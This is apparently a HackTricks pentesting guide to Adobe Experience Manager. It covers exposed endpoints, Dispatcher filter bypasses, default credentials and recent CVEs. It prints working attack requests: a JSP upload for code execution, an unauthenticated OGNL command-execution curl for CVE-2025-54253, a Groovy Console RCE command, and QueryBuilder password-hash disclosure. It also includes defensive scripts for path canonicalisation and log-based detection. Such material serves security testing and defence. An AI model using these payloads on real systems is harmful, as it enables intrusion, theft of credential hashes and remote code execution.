# AEM (Adobe Experience Manager) Pentesting
Tip

Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR). From an attacker's perspective, AEM instances frequently expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that get patched every quarter.

The checklist below focuses on the externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2026).
## 1. Fingerprinting

```bash
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1        # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```

Other quick indicators:

- `/etc.clientlibs/` static path present (returns JS/CSS).
- `/libs/granite/core/content/login.html` login page with the "Adobe Experience Manager" banner.
- `</script><!--/* CQ */-->` comment at the bottom of the HTML.
## 2. High-value unauthenticated endpoints

| Path | What you get | Notes |
|---|---|---|
| `/.json`, `/.1.json` | JCR nodes via DefaultGetServlet | Usually blocked, but the Dispatcher bypass (see below) works. |
| `/bin/querybuilder.json?path=/` | QueryBuilder API | Leaks the page tree, internal paths, user names. |
| `/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds available → bundle-upload RCE. |
| `/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload. |
| `/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution. |
| `/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure. |
| `/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector. |
| `/adminui/debug` | AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint evaluates OGNL unauthenticated → RCE. |
### Dispatcher bypass tricks (still working in 2025/2026)

Most production sites sit behind the Dispatcher (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.

#### Classic semicolon + allowed extension

```http
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```

#### Encoded slash bypass (2025 KB ka-27832)

```http
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
```

If the Dispatcher allows encoded slashes, this returns JSON even when `/bin` is supposedly denied.
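Both bypasses above work for the same reason: the filter matches the request target as received, while Sling resolves the percent-decoded path with the `;` path parameters stripped. The script below is an added illustration (not from the page, not Adobe Dispatcher code) that models a filter as an ordered rule list where the last matching glob wins, runs the two bypass requests from this section through it, and then runs them again after canonicalising the path the way Sling will resolve it. The rule list `WEAK_RULES` is a hypothetical default-allow policy, constructed to resemble the misconfiguration being described.

```python
"""Dispatcher-style filter evaluation before and after path canonicalisation.
Added example; WEAK_RULES and the matcher are a simplified, hypothetical model."""
import posixpath
from fnmatch import fnmatchcase
from urllib.parse import unquote, urlsplit

# Hypothetical weak policy: allow everything, deny a few trees, then re-allow
# static extensions at the end.  Rules are evaluated in order; last match wins.
WEAK_RULES = [
    ("allow", "*"),
    ("deny", "/bin/*"),
    ("deny", "/system/*"),
    ("deny", "/crx/*"),
    ("allow", "*.css"),
    ("allow", "*.js"),
]


def evaluate(rules, path: str) -> str:
    """Return 'allow' or 'deny' for `path` under an ordered glob rule list."""
    verdict = "deny"
    for action, glob in rules:
        if fnmatchcase(path, glob):
            verdict = action
    return verdict


def canonical_path(request_target: str) -> str:
    """Reduce the request target to the path Sling will actually resolve:
    1. percent-decode repeatedly (bounded) so %2f and %252f become '/',
    2. drop Sling path parameters (';' and the rest of that segment),
    3. collapse duplicate slashes and resolve '..'."""
    path = urlsplit(request_target).path
    for _ in range(3):  # bounded so a pathological input cannot loop
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # normpath keeps a leading '//', so strip and re-add a single slash
    return "/" + posixpath.normpath(path or "/").lstrip("/")


def naive_verdict(request_target: str) -> str:
    """What the filter decides when it matches the raw, undecoded path."""
    return evaluate(WEAK_RULES, urlsplit(request_target).path)


def hardened_verdict(request_target: str) -> str:
    """Same rules, matched against the canonical path instead."""
    return evaluate(WEAK_RULES, canonical_path(request_target))


if __name__ == "__main__":
    for target in (
        "/bin/querybuilder.json;%0aa.css?path=/home&type=rep:User",
        "/%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType",
        "/content/../bin/querybuilder.json",
        "/content/site/en.html",
    ):
        print(f"{target:68} raw={naive_verdict(target):5} canonical={hardened_verdict(target)}")
```

Under the raw match both bypass requests come back `allow` (the first because `*.css` is the last rule that matches, the second because `/bin/*` never matches a path starting with `/%2f`); after canonicalisation both resolve to `/bin/querybuilder.json` and are denied. A deny-by-default rule order, which is what Adobe's own Dispatcher guidance starts from, shrinks the damage further because an unmatched path is then rejected rather than served.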
## 3. Common misconfigurations (still present in 2026)

- Anonymous POST servlet → `POST /.json` with `:operation=import` allows creating new JCR nodes. Denying `*.json` POST at the Dispatcher fixes it.
- World-readable user profiles → the default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
- Default credentials → `admin:admin`, `author:author`, `replication:replication`.
- WCMDebugFilter enabled → reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
- Groovy Console exposed → remote code execution by posting a Groovy script:

  ```bash
  curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
  ```

- Dispatcher encoded-slash gap → `/bin/querybuilder.json` and `/etc/truststore.json` are reachable via `%2f`/`%3B` even when blocked by path filters.
- AEM Forms Struts devMode left enabled → `/adminui/debug?expression=` evaluates OGNL without authentication (CVE-2025-54253), giving unauthenticated RCE; combined with an XXE in Forms submissions (CVE-2025-54254) it allows file read.
## 4. Recent vulnerabilities (service-pack cycle)

| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution through the author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) → update to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code execution (low privilege). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via a crafted URL. |

Always check the APSB bulletin matching the customer's service pack and push for the latest release, 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE needs its own add-on hotfix 6.5.0-0108+.
## 5. Exploitation snippets

### 5.1 RCE via dispatcher bypass + JSP upload

If anonymous write is possible:

```http
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```

Now request `/content/evil.jsp` → the JSP runs as the AEM process user.
### 5.2 SSRF to RCE (historical, < 6.3)

```
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
```

`aem_ssrf2rce.py` from aem-hacker automates the whole chain.
### 5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)

```bash
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
```

If vulnerable, the HTTP body contains the command output.
### 5.4 QueryBuilder hash disclosure (encoded slash bypass)

```http
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
```

Returns user nodes including `rep:password` hashes when the anonymous read ACLs are left at their defaults.
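Every request shape in sections 2, 3 and 5 leaves a distinctive trace in the web-server or Dispatcher access log, so the same list doubles as a detection checklist. The script below is an added example (not from the page, not a vendor tool) that scans Combined Log Format lines, decodes the request target the way Sling will see it, and tags requests matching those shapes: filter evasion (`;`, `%2f`, `%3B`, double encoding, `..`), QueryBuilder user enumeration, the Forms `/adminui/debug?expression=` devMode endpoint, Sling POST writes, the Groovy and OSGi consoles, Package Manager, the legacy Salesforce SSRF path, `_jcr_content`/`.json` probing and `?debug=layout`. The log lines in `SAMPLE_LOG` are constructed and the tag names are this example's own.

```python
"""Tag AEM attack patterns in access logs.  Added detection example; the log
lines are constructed and the signature list is illustrative, not exhaustive."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: two benign requests, then requests shaped like the
# techniques on this page (the OGNL line carries a harmless expression).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2026:10:00:01 +0000] "GET /content/site/en.html HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jan/2026:10:00:02 +0000] "GET /etc.clientlibs/site/clientlibs/main.css HTTP/1.1" 200 812
198.51.100.7 - - [10/Jan/2026:10:01:10 +0000] "GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User&p.hits=full HTTP/1.1" 200 9731
198.51.100.7 - - [10/Jan/2026:10:01:11 +0000] "GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1" 200 4410
198.51.100.7 - - [10/Jan/2026:10:01:12 +0000] "POST /.json HTTP/1.1" 201 0
198.51.100.7 - - [10/Jan/2026:10:01:13 +0000] "GET /adminui/debug?expression=1%2B1 HTTP/1.1" 200 38
198.51.100.7 - - [10/Jan/2026:10:01:14 +0000] "POST /bin/groovyconsole/post.json HTTP/1.1" 403 0
198.51.100.7 - - [10/Jan/2026:10:01:15 +0000] "GET /system/console/bundles HTTP/1.1" 403 0
198.51.100.7 - - [10/Jan/2026:10:01:16 +0000] "GET /content/site/en.html?debug=layout HTTP/1.1" 200 6010
198.51.100.7 - - [10/Jan/2026:10:01:17 +0000] "GET /content/site/_jcr_content.json HTTP/1.1" 404 0
"""


def classify(method: str, target: str) -> list:
    """Return the list of signature tags matching one request line."""
    parts = urlsplit(target)
    raw_path = parts.path
    decoded = unquote(unquote(raw_path))           # covers %2f and %252f
    path = re.sub(r"/+", "/", decoded.split(";", 1)[0])  # drop Sling path params, collapse '//'
    query = parse_qs(parts.query)
    lowered = raw_path.lower()
    tags = []
    if ";" in decoded or ".." in decoded or any(t in lowered for t in ("%2f", "%3b", "%25")):
        tags.append("dispatcher-filter-evasion")
    if path.startswith("/bin/querybuilder.json"):
        tags.append("querybuilder")
        if "rep:User" in query.get("type", []):
            tags.append("user-enumeration")
    if path.startswith("/adminui/debug") and "expression" in query:
        tags.append("forms-devmode-ognl")          # CVE-2025-54253 request shape
    if method == "POST" and path.endswith((".json", ".jsp")):
        tags.append("sling-post-write")
    if path.startswith(("/bin/groovyconsole", "/etc/groovyconsole")):
        tags.append("groovy-console")
    if path.startswith("/system/console"):
        tags.append("osgi-console")
    if path.startswith("/crx/packmgr"):
        tags.append("package-manager")
    if path.startswith("/libs/mcm/salesforce/customer.html"):
        tags.append("legacy-ssrf")
    if "_jcr_content" in path or path.startswith("/."):
        tags.append("jcr-probe")
    if "layout" in query.get("debug", []):
        tags.append("wcmdebugfilter-xss")
    return tags


def scan(log_text: str) -> list:
    """Parse each log line and keep only the ones that hit at least one tag."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["method"], m["target"])
        if tags:
            findings.append({"client": m["ip"], "method": m["method"],
                             "target": m["target"], "status": int(m["status"]), "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['client']:14} {f['status']} {f['method']:4} {f['target'][:60]:60} {','.join(f['tags'])}")
```

Note that the 403 responses still get tagged: a blocked probe of `/system/console/bundles` is exactly the signal that tells you someone is working through this checklist against your instance, and a 200 on `/adminui/debug?expression=` or on an encoded-slash QueryBuilder request means the mitigation is missing, not just that the probe happened.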
## 6. Tools

- aem-hacker → Swiss-army enumeration script; supports dispatcher bypass, SSRF detection, default-creds checks and more.

  ```bash
  python3 aem_hacker.py -u https://target --host attacker-ip
  ```

- Tenable WAS plugin 115065 → Detects the QueryBuilder hash disclosure & encoded-slash bypass directly (published Dec 2025).
- Content brute-force → iteratively request `/_jcr_content.(json|html)` to discover hidden components.
- osgi-infect → upload a malicious OSGi bundle via `/system/console/bundles` if creds are available.
## References

- Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)